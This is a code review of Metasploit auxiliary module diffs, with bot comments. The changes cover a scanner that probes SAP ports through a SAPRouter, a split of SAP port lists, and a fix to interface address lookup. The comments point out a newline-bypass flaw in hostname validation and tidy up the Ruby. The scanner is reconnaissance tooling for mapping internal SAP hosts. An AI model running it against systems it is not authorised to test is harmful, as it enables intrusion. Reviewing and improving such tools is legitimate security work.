when /partner .* not reached/
vprint_error("#{ip}:#{port} - host unreachable")
else
vprint_error("#{ip}:#{port} - unknown error message")
end
@ -266,11 +275,40 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
def validate(range)
hosts_list = range.split(",")
return false if hosts_list.nil? or hosts_list.empty?
hosts_list.each do |host|
unless Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX
return false
end
end
end
def run
if datastore['RESOLVE'] == 'remote'
range = datastore['TARGETS']
unless validate(range)
print_error("TARGETS must be a comma separated list of IP addresses or hostnames when RESOLVE is remote")
return
end
range.split(/,/).each do |host|
run_host(host)
end
else
# resolve IP or crack IP range
ip_list = Rex::Socket::RangeWalker.new(datastore['TARGETS'])
ip_list.each do |ip|
run_host(ip)
end
end
end
def run_host(ip)
sap_host = datastore['SAPROUTER_HOST']
sap_port = datastore['SAPROUTER_PORT']
ports = datastore['PORTS']
# if port definition has NN then we require INSTANCES
@ -282,8 +320,7 @@ class Metasploit3 < Msf::Auxiliary
ports = build_sap_ports(ports)
if ports.empty?
print_error('Error: No valid ports specified')
return
raise Msf::OptionValidateError.new(['PORTS'])
end
print_status("Scanning #{ip}")
@ -301,15 +338,10 @@ class Metasploit3 < Msf::Auxiliary
begin
# create ni_packet to send to saprouter
routes = {sap_host => sap_port, ip => port}
routes = {rhost => rport, ip => port}
ni_packet = build_ni_packet(routes)
s = connect(false,
{
'RPORT' => sap_port,
'RHOST' => sap_host
}
)
s = connect(false)
s.write(ni_packet, ni_packet.length)
response = s.get()
@ -320,7 +352,7 @@ class Metasploit3 < Msf::Auxiliary
end
rescue ::Rex::ConnectionRefused
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{sap_host}:#{sap_port} - Connection Refused")
print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused")
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Rex::Post::Meterpreter::RequestError
@ -354,10 +386,19 @@ class Metasploit3 < Msf::Auxiliary
r.each do |res|
tbl << [res[0], res[1], res[2], res[3]]
# we can't report if resolution is remote, since host is unknown locally
if datastore['RESOLVE'] == 'local'
begin
report_service(:host => res[0], :port => res[1], :state => res[2])
rescue ActiveRecord::RecordInvalid
# Probably raised because the Address is reserved, for example
# when trying to report a service on 127.0.0.1
print_warning("Can't report #{res[0]} as host to the database")
end
end
end
print_warning("Warning: Service info could be innacurated")
print_warning("Warning: Service info could be inaccurate")
print(tbl.to_s)
end
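Review bot: `VALID_HOSTNAME_REGEX` anchors with `^` and `$`, which in Ruby match at line boundaries, so a TARGETS entry containing a newline passes `validate` as long as one of its lines looks like a hostname; since the value is then sent to the SAPRouter in `build_ni_packet`, anchor the whole string with `\A` and `\z` instead: `VALID_HOSTNAME_REGEX = /\A(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])\z/`. `validate` only returns `false` explicitly; on success its value is the array returned by `hosts_list.each`, which is truthy by accident, and `range.split(",")` never returns nil, so the body is clearer as `hosts_list.all? { |host| Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX }` with the nil check dropped. `run` re-splits with `range.split(/,/)` and neither path strips whitespace, so `"a.example, b.example"` fails validation on the second entry only because of the space; a `.map(&:strip)` in both places (or one shared split) would make the two agree.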

@ -47,15 +47,20 @@ class Metasploit4 < Msf::Auxiliary
def_ports = [
'32NN', '33NN', '48NN', '80NN', '36NN', '81NN', '5NN00', '5NN01', '5NN02',
'5NN03', '5NN04', '5NN05', '5NN06', '5NN07', '5NN08', '5NN10', '5NN16',
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '21212', '21213', '59975',
'59976', '4238', '4239','4240', '4241', '3299', '3298', '515', '7200',
'7210', '7269', '7270', '7575', '5NN15', '39NN', '3909', '4NN00', '8200',
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '3NN01', '3NN02',
'3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08', '3NN11', '3NN17',
'20003', '20004', '20005', '20006', '20007', '31596', '31597', '31602',
'31601', '31604', '2000', '2001', '2002', '8355', '8357', '8351' ,'8352',
'8353', '8366', '1090', '1095', '20201', '1099', '1089'
'5NN13', '5NN14', '5NN17', '5NN18', '5NN19', '5NN15', '39NN', '4NN00',
'3NN01', '3NN02', '3NN03', '3NN04', '3NN05', '3NN06', '3NN07', '3NN08',
'3NN11', '3NN17'
]
static_ports = [
'21212', '21213', '59975', '59976', '4238', '4239','4240', '4241', '3299',
'3298', '515', '7200', '7210', '7269', '7270', '7575', '3909', '8200',
'8210', '8220', '8230', '4363', '4444', '4445', '9999', '20003', '20004',
'20005', '20006', '20007', '31596', '31597', '31602', '31601', '31604',
'2000', '2001', '2002', '8355', '8357', '8351' ,'8352', '8353', '8366',
'1090', '1095', '20201', '1099', '1089'
]
ports = []
# Build ports array from valid instance numbers
@ -94,7 +99,7 @@ class Metasploit4 < Msf::Auxiliary
final_ports << dport.gsub("NN", inst)
end
end
final_ports.push(*static_ports)
ports = final_ports
if ports.empty?
@ -222,14 +227,15 @@ class Metasploit4 < Msf::Auxiliary
end
print_good("#{ip}:#{port}\t - #{service} OPEN")
=begin
report_note(:host => "#{ip}",
begin
report_note(
:host => "#{ip}",
:proto => 'TCP',
:port => "#{port}",
:type => 'SAP',
:data => "#{service}")
=end
:data => "#{service}"
)
end
r << [ip,port,"open", service]
rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port}\t - TCP closed")
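Review bot: The `begin ... end` wrapped around `report_note` has no `rescue` or `ensure`, so it is a leftover from replacing the `=begin/=end` comment block and can be removed, leaving the bare `report_note(...)` call. The interpolations `:host => "#{ip}"`, `:port => "#{port}"` and `:data => "#{service}"` only stringify values that are already usable as-is, and the port in particular ends up as a String here while the `report_service` calls elsewhere in this commit pass it through unchanged; `:host => ip, :port => port, :data => service` is the plainer form, presumably also what the note schema expects — worth confirming. The `static_ports` split above it is a good change; a one-line comment such as `# Ports that carry no NN instance placeholder and are added unchanged` on `static_ports = [` would explain the distinction to the next reader.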

@ -74,7 +74,7 @@ class Metasploit3 < Msf::Auxiliary
# this is needed on windows cause we send interface directly to Pcap functions
@interface = get_interface_guid(@interface)
@iface_ip = datastore['LOCALIP']
@iface_ip ||= Pcap.lookupaddrs(@interface)[0] if netifaces
@iface_ip ||= get_ipv4_addr(@interface) if netifaces
raise "Interface IP is not defined and can not be guessed" unless @iface_ip
# start with blank slate
